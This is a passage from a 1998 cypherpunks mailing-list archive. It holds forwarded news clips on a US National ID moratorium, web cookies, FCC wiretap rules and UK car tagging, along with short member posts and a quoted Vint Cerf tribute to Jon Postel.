Privacy Reporter" (our bi-monthly 12 page hard-copy newsletter in
multi-contributor format) for the duration of your membership.

For a contribution form with postal instructions please send the following
message "ISPI Contribution Form" to ISPI4Privacy@ama-gi.com .

We maintain a strict privacy policy. Any information you divulge to ISPI
is kept in strict confidence. It will not be sold, lent or given away to
any third party.











****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 18 Oct 1998 08:51:38 +0800
To: cypherpunks@cyberpass.net
Subject: IP: ISPI Clips 5.50: National ID postponed until 1999
Message-ID: <199810180033.RAA27258@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ama-gi ISPI" <offshore@email.msn.com>
Subject: IP: ISPI Clips 5.50: National ID postponed until 1999
Date: Sat, 17 Oct 1998 00:03:08 -0700
To: <Undisclosed.Recipients@majordomo.pobox.com>

ISPI Clips 5.50: National ID postponed until 1999
News & Info from the Institute for the Study of Privacy Issues (ISPI)
Saturday October 17, 1998
ISPI4Privacy@ama-gi.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This From: WorldNetDaily, October 16, 1998
http://www.worldnetdaily.com

National ID postponed until 1999
Moratorium in appropriations bill approved by Congress this week
http://www.worldnetdaily.com/exclusiv/981016_bres_national_id_po.html


By
David M. Bresnahan
Copyright 1998, WorldNetDaily.com

Implementation of a National ID card will be automatically imposed on all
states unless Congress takes action in 1999.

More immediate efforts to impose the system, first exposed in
WorldNetDaily, were derailed by a one-year moratorium on the National ID
regulations included in the omnibus appropriations bill passed by Congress
Thursday. It was a provision that was not without controversy.

The moratorium was first included in the transportation appropriations
bill, but Rep. Lamar Smith, R-TX, convinced Speaker Newt Gingrich, R-GA, to
remove it before passage, according to House Transportation Committee
sources.

Rep. Frank Wolf, R-VA, chairman of the House Appropriations Transportation
Subcommittee included the ban in the omnibus bill, according to a committee
staff member. However, Smith continued to make efforts to kill the
provision, according to Patrick Poole of the watchdog group Free Congress
Foundation.

"It was reported that Lamar Smith had obtained an agreement from Speaker
Gingrich to eliminate this provision from the bill," reported Poole. The
ban was back in the bill "after many House members openly complained to the
speaker about Lamar Smith's seemingly religious devotion to the National ID
idea and the American people's vehement opposition to being branded and
tagged by the U.S. government."

Numerous organizations opposed to the concept of a National ID rallied
their members to send thousands of letters, faxes, and make phone calls to
Congress for the past two weeks. Smith failed to return calls to
WorldNetDaily.com, but he did publish a letter in the "Washington Times" on
Tuesday because of the many calls his office received.

"I do not support a National ID card and don't know anyone in Congress who
does," said Smith in his letter. He tried to label those voicing opposition
as radicals when he added, "There are fringe groups that believe the United
Nations is taking over Yellowstone National Park, that Congress is creating
a National ID card or that they have been abducted by UFOs."

Congress put the wheels in motion to create a National ID card in 1996 with
the passage of the Illegal Immigration Reform and Immigrant Responsibility
Act. One section of the act, which was largely unnoticed at the time,
requires all states to make their driver's licenses comply with certain
guidelines found in Section 656 (b) of the act.

The law prohibits states from issuing driver's licenses unless they comply
with the new requirements beginning Oct. 1, 2000. The new licenses must use
the Social Security number as the driver's license number, for example.

The act also calls for digitized biometric information to be a part of each
license, or "smart card." The biometric information will include
fingerprints, retina scans, DNA prints and other similar information.

Responsibility for the design and implementation of the cards has been
given to the National Highway Traffic Safety Administration of the
Department of Transportation. That agency has recently published the
proposed "Driver's License/SSN/National Identification Document," which
contains the guidelines which must be in force by Oct. 1, 2000. The "Notice
of Proposed Rule Making" sets out the standards for each state to follow in
the design of "identification documents."

"These new National ID regulations violate every notion of federalism,
because they force states to comply with regulations issued by the federal
government without any constitutional authority to do so," said Poole
recently. "Nor are federal agencies empowered to force states to gather
detailed information on every person in order to comply with federal
mandates. The net result of the DOT's regulations is to establish a
National ID system, which has been opposed by almost every non-governmental
sector for the past five decades."

The moratorium is needed while efforts are made to repeal Section 656 (b)
of the act. The moratorium will relieve states from spending money on
unnecessary development costs.

House Majority Leader Dick Armey, R-TX, Rep. Ron Paul, R-TX, and Rep. Bob
Barr, R-GA, have been working on repeal legislation, but there was
insufficient time to bring it to a vote during this session of Congress.

"Speaker Gingrich did come dangerously close to selling us out on National
IDs," said a congressional staffer.

Numerous grass-roots organizations opposed to the National ID system were
celebrating the inclusion of the moratorium in the omnibus bill just passed
by Congress.

The DOT solicited public comments on their plans for implementation of
Section 656 (b) of the act earlier this year. The public comment period has
just closed and many thousands of letters in opposition were received,
according to a spokesman. Five states also expressed opposition to the
plan, and only a "small number" of letters supporting the plan were known
to the spokesman, who spoke on condition that his name would not be
published.

The American Association of Motor Vehicle Administrators also wrote to the
DOT and recommended repeal of the law, even though they had once been in
favor of such legislation.

"Over the past 10 years, the AAMVA has vigorously pushed Congress and the
various state motor vehicle directors to implement policies to require the
submission of social security numbers as a condition for issuance of
driver's licenses. This resounding defeat may spell the end of their
ill-fated quest," said Scott McDonald, a grass-roots activist who operates
the "Fight the Fingerprint" website. He is able to mobilize thousands of
activists on a national basis using his e-mail notification system.

"There is no satisfactory condition under which Social Security Numbers may
be required as a condition for travel," said McDonald. "The victory's
definitely not yet won. During these lull periods there's an opportunity
for proponents of these issues to let opposition die down and all of a
sudden, pop, it goes through without anyone even aware of it.

"I don't see how the Department of Transportation could go forth with

implementing the regulation with all that strong opposition to it. Even
five states wrote letters of strong opposition to requiring Social Security
numbers," said McDonald.

"This National ID is not just isolated to America. This is going on all
over the world. Every country has some form of it going on," explained
Jackie Juntti, leader of the Washington Grassroots E-mail Network. Her
group takes credit for defeating an earlier effort in 1997 to put
fingerprints on driver's licenses in Washington state.

"We're just people out here trying to remain free," she said. Juntti's
"NoID Orange Ribbon Campaign," found on many Internet Web sites, began
after she refused to produce a driver's license to board an airplane. She
was searched thoroughly and then granted a seat on the plane.

"For a year we're safe," said Lisa Dean of the Coalition for Constitutional
Liberties, another organization that has been actively campaigning against
the provisions of Section 656 (b). She agreed that the toughest part of her
organization's challenge is in front of her. Rep. Smith, and other
proponents of the measure have framed their issue around illegal
immigration.

Dean's organization has received many responses for and against a National
ID. Many have voiced support for her efforts, but some have told her "what
difference does it make? The government already has our information,"
according to Dean. Others also mention the need to control illegal
immigration.

Now that a moratorium is in place for a year, Dean expects repeal efforts
will also include finding alternative ways to resolve the concerns about
illegal immigrants, although no recommendations are in place as yet.

David Bresnahan, a WorldNetDaily contributing editor, hosts "Talk USA
Investigative Reports" and is the author of "Cover Up: The Art and Science
of Political Deception." His email address is David@talkusa.com.

(c) 1998 Western Journalism Center

--------------------------------NOTICE:------------------------------
ISPI Clips are news & opinion articles on privacy issues from
all points of view; they are clipped from local, national and international
newspapers, journals and magazines, etc. Inclusion as an ISPI Clip
does not necessarily reflect an endorsement of the content or opinion
by ISPI. In compliance with Title 17 U.S.C. section 107, this material is
distributed free without profit or payment for non-profit research
and educational purposes only.
---------------------------------------------------------------------------

ISPI Clips is a FREE e-mail service from the "Institute for the Study
of Privacy Issues" (ISPI). To receive "ISPI Clips" on a regular bases
(up to 3 - 8 clips per day) send the following message  "Please
enter [Your Name] into the ISPI Clips list: [Your e-mail address]" to:
ISPIClips@ama-gi.com  .

The Institute for the Study of Privacy Issues (ISPI) is a small
contributor-funded organization based in Victoria, British Columbia
(Canada). ISPI operates on a not-for-profit basis, accepts no
government funding and takes a global perspective.

ISPI's mandate is to conduct & promote interdisciplinary research
into electronic, personal and  financial privacy with a view toward
helping ordinary people understand the degree of privacy they have
with respect to government, industry and each other and to likewise
inform them about techniques to enhance their privacy.

But, none of this can be accomplished without your kind and
generous financial support. If you are concerned about the erosion
of your privacy in general, won't you please help us continue this
important work by becoming an "ISPI Supporter" or by taking out
an institute Membership?

We gratefully accept all contributions:

  Less than $60    ISPI Supporter
          $60 - $99    Primary ISPI Membership (1 year)
      $100 - $300    Senior ISPI Membership (2 years)
More than $300    Executive Council Membership (life)

Your ISPI "membership" contribution entitles you to receive "The ISPI
Privacy Reporter" (our bi-monthly 12 page hard-copy newsletter in
multi-contributor format) for the duration of your membership.

For a contribution form with postal instructions please send the following
message "ISPI Contribution Form" to ISPI4Privacy@ama-gi.com .

We maintain a strict privacy policy. Any information you divulge to ISPI
is kept in strict confidence. It will not be sold, lent or given away to
any third party.









****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 18 Oct 1998 08:51:48 +0800
To: cypherpunks@cyberpass.net
Subject: IP: ISPI Clips 5.51: Your Online Profile--Where You Go, What You Buy--Is Vulnerable
Message-ID: <199810180033.RAA27269@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ama-gi ISPI" <offshore@email.msn.com>
Subject: IP: ISPI Clips 5.51: Your Online Profile--Where You Go, What You Buy--Is Vulnerable
Date: Sat, 17 Oct 1998 00:04:28 -0700
To: <Undisclosed.Recipients@majordomo.pobox.com>

ISPI Clips 5.51: Your Online Profile--Where You Go, What You Buy--Is
Vulnerable
News & Info from the Institute for the Study of Privacy Issues (ISPI)
Saturday October 17, 1998
ISPI4Privacy@ama-gi.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This From: TIME.com Magazine,  OCTOBER 12, 1998 VOL. 152 NO. 15
http://cgi.pathfinder.com/time/

Watch Your Tracks
Your online profile--where you go, what you buy--is vulnerable.
Here's how to protect it
http://cgi.pathfinder.com/time/magazine/1998/dom/981012/personal_time.your_
tech2a.html

By
MICHAEL KRANTZ
TIME technology writer

Run a search on your PC's hard drive for the phrase "User Profile," and
you'll find a long list of items like this: "yahoo.comTRUE/FALSE 3262463
493 Y v=1&n=82iosk148jr9n." This gibberish is just one in a series of
digital snapshots of my recent online travels: what websites I visited;
what pages I viewed and for how long; what I bought, downloaded or printed.
What's more, every site I visit can send programs called "cookies" down the
phone line into my machine to snag this data and either use it to try to
sell me something ("He spends time at E! Online? Let's spam him with that
Titanic-for-$5 offer!") or sell my "profile" to some other marketer. Yikes.

For years, of course, everyone from insurance adjusters to credit-card
companies has made money swapping consumer profiles like baseball cards.
But the Web is bringing this great American pastime to new levels of
invasive splendor. Ironically, one of the most attractive features of the
Net--its ability to customize content instantly--morphs smoothly into one
of its most sinister: the ability to monitor who you are and what you're
doing online, even as you do it.

It's not just the embarrassment factor we're talking about here: the guy
whose wife checks out his log and finds the porn sites he hit last night.
Consider how much other personal data could become available as we conduct
more and more of our lives in this (thus far) happily unregulated
world--investing and paying our bills online, filling our prescriptions,
etc.

How forthright have websites been about telling users what data they're
unwittingly providing? Not very. Last spring the Federal Trade Commission
studied 1,400 sites and found that only 14% had posted privacy statements
of any kind (though 71 of the 100 busiest sites did so).

While a Senate committee last week approved legislation that would
authorize the FTC to regulate the profiling of children, the agency seems
willing to let the industry clean up its own act with regard to adults.
Enter TRUSTe, a nonprofit group that has persuaded 270 of the Web's most
popular sites to post and abide by statements telling what data they
collect from visitors, how they use that data and how visitors can restrict
that use. Web leaders such as America Online, Microsoft and Netscape plan
an announcement this Wednesday to address privacy concerns.

Some, though, are skeptical that a voluntary system will work. "If
anybody's going to make money off your identity," says Fred Davis, chief
executive officer of the software start-up Lumeria, based in Berkeley,
Calif., "it should be you." And, of course, Fred Davis. Due in early 1999,
Lumeria's software will, among other things, help you control your data,
keeping nosy marketers from grabbing your profile unless you let them. In
fact, Davis thinks companies will eventually pay for the privilege ("Hey,
visitor No. 85834: we see you bought Titanic last week. We'll give you 500
frequent-flyer miles to tell us your name, age and income!").

For now, here's how you can keep those pesky cookies away. If you use
Microsoft's Internet Explorer, choose Internet Options under your View
menu, click the Advanced tab, scroll down to the Cookies subsection and
choose "Disable all cookie use." If you use Netscape Navigator, go to Edit
Preferences under the Edit menu and choose Advanced, then "Turn all cookies
off." But be warned: many sites won't let you in if your browser rejects
cookies, and others will harass you with dialogue boxes urging you to
accept one.


--------------------------------NOTICE:------------------------------
ISPI Clips are news & opinion articles on privacy issues from
all points of view; they are clipped from local, national and international
newspapers, journals and magazines, etc. Inclusion as an ISPI Clip
does not necessarily reflect an endorsement of the content or opinion
by ISPI. In compliance with Title 17 U.S.C. section 107, this material is
distributed free without profit or payment for non-profit research
and educational purposes only.
---------------------------------------------------------------------------

ISPI Clips is a FREE e-mail service from the "Institute for the Study
of Privacy Issues" (ISPI). To receive "ISPI Clips" on a regular bases
(up to 3 - 8 clips per day) send the following message  "Please
enter [Your Name] into the ISPI Clips list: [Your e-mail address]" to:
ISPIClips@ama-gi.com  .

The Institute for the Study of Privacy Issues (ISPI) is a small
contributor-funded organization based in Victoria, British Columbia
(Canada). ISPI operates on a not-for-profit basis, accepts no
government funding and takes a global perspective.

ISPI's mandate is to conduct & promote interdisciplinary research
into electronic, personal and  financial privacy with a view toward
helping ordinary people understand the degree of privacy they have
with respect to government, industry and each other and to likewise
inform them about techniques to enhance their privacy.

But, none of this can be accomplished without your kind and
generous financial support. If you are concerned about the erosion
of your privacy in general, won't you please help us continue this
important work by becoming an "ISPI Supporter" or by taking out
an institute Membership?

We gratefully accept all contributions:

  Less than $60    ISPI Supporter
          $60 - $99    Primary ISPI Membership (1 year)
      $100 - $300    Senior ISPI Membership (2 years)
More than $300    Executive Council Membership (life)

Your ISPI "membership" contribution entitles you to receive "The ISPI
Privacy Reporter" (our bi-monthly 12 page hard-copy newsletter in
multi-contributor format) for the duration of your membership.

For a contribution form with postal instructions please send the following
message "ISPI Contribution Form" to ISPI4Privacy@ama-gi.com .

We maintain a strict privacy policy. Any information you divulge to ISPI
is kept in strict confidence. It will not be sold, lent or given away to
any third party.








****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 18 Oct 1998 08:51:33 +0800
To: cypherpunks@cyberpass.net
Subject: IP: FCC To Propose Resolving Digital Wiretap Debate
Message-ID: <199810180033.RAA27280@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: FCC To Propose Resolving Digital Wiretap Debate
Date: Sat, 17 Oct 1998 06:07:00 -0500
To: believer@telepath.com

Forwarded:
---------------

Date: Sat, 17 Oct 1998 01:37:23 -0500
From: Kepi <kepi@netdoor.com>
Subject: FCC To Propose Resolving Digital Wiretap Debate

Source: Yahoo! News 

Friday October 16 3:00 PM EDT 

FCC To Propose Resolving Digital Wiretap Debate
By Aaron Pressman

WASHINGTON (Reuters) - The Federal Communications Commission next week will
propose requiring telephone companies to make a series of changes to give
law enforcement agencies additional wiretapping capabilities, people
familiar with the plan said.

The proposal, which will only be issued for comment and could be changed,
seeks to resolve the long-running dispute between the telephone industry,
privacy advocates and the FBI over terms of the 1994 Communications
Assistance for Law Enforcement Act.

The law was intended to preserve the FBI's ability to conduct wiretaps as
telephone carriers introduced new digital technology making traditional
alligator clip-and-wire approaches obsolete. But the law also sought to
maintain the existing limits on wiretapping authority that protect the
privacy of ordinary citizens.

Much to the chagrin of privacy groups, the FCC's preliminary proposal would
require wireless telephone carriers to turn over to law enforcers the
location of a mobile phone user at the beginning and end of a tapped call,
people familiar with the plan said.

``From a privacy protection perspective, the tracking question is
tremendously important,'' said Jim Dempsey, senior staff counsel at the
Center for Democracy and Technology, a nonprofit privacy group in Washington.

``Congress never would have passed this legislation if they thought they
were turning cell phones into tracking devices,'' added Dempsey, who as a
congressional staffer helped draft the law.

But, heeding the call of privacy advocates, the FCC proposal will urge
further study concerning the way digital calling information is turned over
to law enforcers.

Under current law, the police must give a judge evidence of probable cause
of criminal activity to get permission to tap a call. But to get basic
routing information, such as what numbers were called from a particular
phone, the police need show only that the information might be relevant to
an investigation, a much lower standard.

In digital calling networks, however, a call is split up into tiny data
packets that contain both the voice transmission and routing and signaling
information.

An industry proposal last year would have turned over to police entire
packets of information, including both the routing data and the actual call
itself, when just basic routing information was authorized.

The FCC proposal will seek to determine if a more limited method of handing
over just routing information would be feasible.

The FBI has already rejected as inadequate the industry proposal that
included the cell phone location and full packet disclosure provisions. The
agency asked the FCC to require carriers to add another nine capabilities,
such as the ability to continue listening to a conference call even if the
caller being tapped hangs up.

The FCC proposal recommends some but not all of the nine items should be
added to phone networks, but also asked for further comments on all nine
items.

The industry fears refitting existing equipment to add those capabilities
will cost billions of dollars. Their fears were confirmed in a recent
letter from Attorney General Janet Reno and FBI Director Louis Freeh to
Congress, dated Oct. 6, and obtained by Reuters, that conceded the costs
could reach $2 billion.

Industry participants were pleased that the FCC was moving to address the
issues, though. ``We have not seen the details yet but we're pleased the
FCC is moving forward,'' Jeff Cohen, a spokesman for the Personal
Communications Industry Association, said.

Copyright (c) 1998 Reuters Limited. All rights reserved.

http://dailynews.yahoo.com/headlines/tc/story.html?s=v/nm/19981016/tc/fcc_2.
html



****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 18 Oct 1998 08:53:07 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Tracking: Bar Codes/Elec.Tags for License Plates
Message-ID: <199810180033.RAA27291@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Tracking: Bar Codes/Elec.Tags for License Plates
Date: Sat, 17 Oct 1998 11:28:20 -0500
To: believer@telepath.com

Source:  London Telegraph
http://www.telegraph.co.uk:80/et?ac=000150689433551&rtmo=Vu5wFmwx&atmo=99999
999&P4_FOLLOW_ON=/98/10/17/ntag17.html&pg=/et/98/10/17/ntag17.html

Car tagging may help cut theft, says minister
 By Andrew Sparrow, Political Correspondent 

 CAR number plates could be fitted with bar codes or electronic tags in a
move to cut crime.

 Alun Michael, a Home Office minister, said it was "odd" that while
consumer goods such as whisky bottles could be tagged, valuable items like
cars were not dealt with in the same way.

 Tagging is being considered as one option that could help the Government
hit its target of reducing car crime by 30 per cent over the next five
years. Mr Michael said the Government's Vehicle Crime Reduction Action
Team, which includes ministers, police officers and car manufacturers, was
examining the practicalities of improving security features on cars.

 The Government would also improve security at car parks, where more than
30 per cent of all auto crime occurred. Cars left in car parks were 200
times more likely to be stolen or broken into than those garaged at home,
Mr Michael told an Association of Chief Police Officers car crime
conference. Yet car parks that had improved their security had seen
break-ins fall by an average of 70 per cent.

 Mr Michael said the action team would also encourage owners of older cars
to make them harder to steal. A car registered in 1985 was 14 times more
likely to be taken than a new car. Manufacturers will be urged to make
their products more theft-proof. Mr Michael said innovations that the
Government would like to see introduced as standard included toughened
glass windows to ward off opportunist thieves stealing stereos and handbags
from vehicles.

 Delegates heard that commonly quoted statistics placing Britain at the
head of the European vehicle theft league might be misleading. Elaine
Hardy, of the International Car Distribution Programme, said that while
figures showed vehicle theft in England and Wales to be roughly double the
European average as a percentage of the number of vehicles on the roads,
definitions of car theft varied enormously.

 For example, she said, in the Netherlands a vehicle was listed merely as
"missing" until it had been gone for more than a month. In other countries,
cars recovered within 90 days were wiped from the figures. The true story
could be that domestic statistics were roughly comparable to others in Europe.

(c) Copyright of Telegraph Group Limited 1998. 
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Sat, 17 Oct 1998 23:19:11 +0800
To: "Marcel Popescu" <cypherpunks@toad.com>
Subject: Re: Off-Topic
In-Reply-To: <001101bdf9c0$906950a0$020101df@sorexim.ro>
Message-ID: <3.0.5.32.19981018004316.0084c100@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain



At 01:23 PM 10/17/98 +0200, Marcel Popescu wrote:
>Sorry for the off-topic, but does anybody know of a list related to
>militias, gun-control and the like?
>
>Thanks,
>Mark
>

Sure. Try alt.gun-nut.psycho.felon.wannabe.

be sure to Cc: the IRS, NSA, FBI, CIA, NSU, ICQ and SS.

Enjoy your newfound status as 3l33t and to be f34r3d!!!

Gee, Hey Tim, perhaps you could provide directions in technicolor like you
did for the bag lady not long ago. 

Oh, BTW Mr. Popescu, Pppttthhuuuuu!!!!!!



	Fear has a scent and Money has a color,
	but Stupid walks right up and slaps you in the face,
	
	Every time.

						-- me, I think.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph>
Date: Tue, 20 Oct 1998 22:52:53 +0800
To: cypherpunks@toad.com
Subject: desperate....
Message-ID: <Pine.GSO.3.96.981007122244.26809A-100000@mudspring.uplb.edu.ph>
MIME-Version: 1.0
Content-Type: text/plain




Could you give any info about wireless transmission especifically 
satellite transmission.

Thank you and I desperately need your help.












~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Some people they might say that I'm hard to get to know.
I go my own sweet way, well that maybe so.
Something about the crowd that makes me walk alone. 
I never had a need in me to be the party's life and soul.

It's me Bernie.
metaphone@altavista.net
``````````````````````````````````````````````````````````````````````````````




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph>
Date: Tue, 20 Oct 1998 22:28:43 +0800
To: cypherpunks@toad.com
Subject: criticize....
Message-ID: <Pine.GSO.3.96.981007164959.8021A-100000@mudspring.uplb.edu.ph>
MIME-Version: 1.0
Content-Type: text/plain



I am creating a program about sparse matrix

I am going to use different compression schemes used in building
compilers.

It is suppose to output a library wherein it support the compression
scheme.

It would either be used by C, Pascal, or FORTRAN whatever the user intends
to use.

Could you degrade or "upgrade" my said proposal (just say anything except
nonsense of course).

Thank you very much.


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Some people they might say that I'm hard to get to know.
I go my own sweet way, well that maybe so.
Something about the crowd that makes me walk alone. 
I never had a need in me to be the party's life and soul.

It's me Bernie.
metaphone@altavista.net
``````````````````````````````````````````````````````````````````````````````




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph>
Date: Tue, 20 Oct 1998 22:27:00 +0800
To: coderpunks@toad.com
Subject: desperate....
In-Reply-To: <Pine.GSO.3.96.981007122244.26809A-100000@mudspring.uplb.edu.ph>
Message-ID: <Pine.GSO.3.96.981007165128.8021B-100000@mudspring.uplb.edu.ph>
MIME-Version: 1.0
Content-Type: text/plain




 
Could you give any info about wireless transmission especifically 
satellite transmission.
 
Thank you and I desperately need your help.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Tue, 20 Oct 1998 11:32:26 +0800
To: Declan McCullagh <declan@well.com>
Subject: Re: "Microsoft is racist"
In-Reply-To: <199810192111.OAA06317@smtp.well.com>
Message-ID: <Pine.BSF.3.91.981018020607.4728B-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




Yeah, they're definately racist - they have a thing against left-handed
nocturnal diseased marsupials. They haven't donated any money to me. 
OTOH, I haven't donated any money to Howard University. 

How about you? Have you donated money to Howard University? I'll bet you've 
donated more money to Micro$oft ... Which side are you on, anyway ... ??

Since you're local to the aforementioned institution, how about looking 
into whether Howard U have any merit to their claims? Does Micro$oft display 
racist hiring practices, or other discriminatory practices, other than 
failing to donate money to a particular institution?

DisturbedKeyMonger

On Mon, 19 Oct 1998, Declan McCullagh may have cut and pasted:

> 
> 
> http://www.wired.com/news/news/politics/story/15702.html
> 
>                      On the sidewalk in front of the building, a
>                      handful of protesters held up a sign
>                      saying "Microsoft is racist." The group
>                      attacked the company for not donating
>                      money to Howard University, which is
>                      predominately black. 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevlar <webmaster@max-web.com>
Date: Mon, 19 Oct 1998 03:57:32 +0800
To: cypherpunks@toad.com
Subject: Re: More on Postel
In-Reply-To: <36298670.B1A@att.com>
Message-ID: <3.0.5.32.19981018121429.008e7100@max-web.com>
MIME-Version: 1.0
Content-Type: text/plain



Damn. Talk about a blow to the heart.

Where can I find more information about this great man and his
achievements? Has there been any memorial web sites put up? I'de be happy
to donate space on my server. Just e-mail me at god@max-web.com. Are there
any news stories worth reading on this subject?

At 11:10 PM 10/17/98 -0700, you wrote:
>Subject: IP: Remembrance/postel
>From: Dave Farber [farber@cis.upenn.edu]
>
>I, and others I fear, have spent a sleepless night after hearing of the
>death of Jon Postel last night. This morning there was a  note in my
>mail box from Vint Cerf that said many of the things I feel at this
>time. I asked him for permission to send on which he granted.
>
>I also remember Jon. I was his primary thesis advisor along with Jerry
>Estrin and I remember with fond memories the months spent closely
>working with Jon while his eager mind developed the ideas in back of
>what was a pioneering thesis that founded the area of protocol
>verification.  Since I was at UC Irvine and Jon at UCLA we used to meet
>in the morning prior to my ride to UCI at a Pancake House in Santa
>Monica for breakfast and the hard work of developing a thesis. I gained
>a great respect for Jon then and 10 pounds of weight.
>
>I will miss him greatly. Jon was my second Ph.D. student. The first,
>Philip Merlin, also died way before his time.
>
>Dave
>
>________________________________________________________________________
>
> October 17, 1998
>
>I REMEMBER IANA
>
>Vint Cerf
>
>A long time ago, in a network, far far away, a great adventure took
>place...
>
>Out of the chaos of new ideas for communication, the experiments, the
>tentative designs, and crucible of testing, there emerged a cornucopia
>of networks. Beginning with the ARPANET, an endless stream of networks
>evolved, and ultimately were interlinked to become the Internet. Someone
>had to keep track of all the protocols, the identifiers, networks and
>addresses and ultimately the names of all the things in the networked
>universe. And someone had to keep track of all the information that
>erupted with volcanic force from the intensity of the debates and
>discussions and endless invention that has continued unabated for 30
>years. That someone was Jonathan B. Postel, our Internet Assigned
>Numbers Authority, friend, engineer, confidant, leader, icon, and now,
>first of the giants to depart from our midst.
>
>Jon, our beloved IANA, is gone. Even as I write these words I cannot
>quite grasp this stark fact. We had almost lost him once before in 1991.
>Surely we knew he was at risk as are we all. But he had been our rock,
>the foundation on which our every web search and email was built, always
>there to mediate the random dispute, to remind us when our documentation
>did not do justice to its subject, to make difficult decisions with
>apparent ease, and to consult when careful consideration was needed. We
>will survive our loss and we will remember. He has left a monumental
>legacy for all Internauts to contemplate. Steadfast service for decades,
>moving when others seemed paralyzed, always finding the right course in
>a complex minefield of technical and sometimes political obstacles.
>
>Jon and I went to the same high school, Van Nuys High, in the San
>Fernando Valley north of Los Angeles. But we were in different classes
>and I really didn't know him then. Our real meeting came at UCLA when we
>became a part of a group of graduate students working for Prof. Leonard
>Kleinrock on the ARPANET project. Steve Crocker was another of the Van
>Nuys crowd who was part of the team and led the development of the first
>host-host protocols for the ARPANET. When Steve invented the idea of the
>Request for Comments series, Jon became the instant editor. When we
>needed to keep track of all the hosts and protocol identifiers, Jon
>volunteered to be the Numbers Czar and later the IANA once the Internet
>was in place. 
>
>Jon was a founding member of the Internet Architecture Board and served
>continuously from its founding to the present. He was the FIRST
>individual member of the Internet Society I know, because he and Steve
>Wolff raced to see who could fill out the application forms and make
>payment first and Jon won. He served as a trustee of the Internet
>Society. He was the custodian of the .US domain, a founder of the Los
>Nettos Internet service, and, by the way, managed the networking
>research division of USC Information Sciences Institute.
>
>Jon loved the outdoors. I know he used to enjoy backpacking in the high
>Sierras around Yosemite. Bearded and sandaled, Jon was our resident
>hippie-patriarch at UCLA. He was a private person but fully capable of
>engaging photon torpedoes and going to battle stations in a good
>engineering argument. And he could be stubborn beyond all expectation.
>He could have outwaited the Sphinx in a staring contest, I think.
>
>Jon inspired loyalty and steadfast devotion among his friends and his
>colleagues. For me, he personified the words "selfless service." For
>nearly 30 years, Jon has served us all, taken little in return, indeed
>sometimes receiving abuse when he should have received our deepest
>appreciation. It was particularly gratifying at the last Internet
>Society meeting in Geneva to see Jon receive the Silver Medal of the
>International Telecommunications Union. It is an award generally
>reserved for Heads of State but I can think of no one more deserving of
>global recognition for his contributions. 
>
>While it seems almost impossible to avoid feeling an enormous sense of
>loss, as if a yawning gap in our networked universe had opened up and
>swallowed our friend, I must tell you that I am comforted as I
>contemplate what Jon has wrought. He leaves a legacy of edited documents
>that tell our collective Internet story, including not only the
>technical but also the poetic and whimsical as well. He completed the
>incorporation of a successor to his service as IANA and leaves a lasting
>legacy of service to the community in that role. His memory is rich and
>vibrant and will not fade from our collective consciousness. "What would
>Jon have done?" we will think, as we wrestle in the days ahead with the
>problems Jon kept so well tamed for so many years. 
>
>There will almost surely be many memorials to Jon's monumental service
>to the Internet Community. As current chairman of the Internet Society,
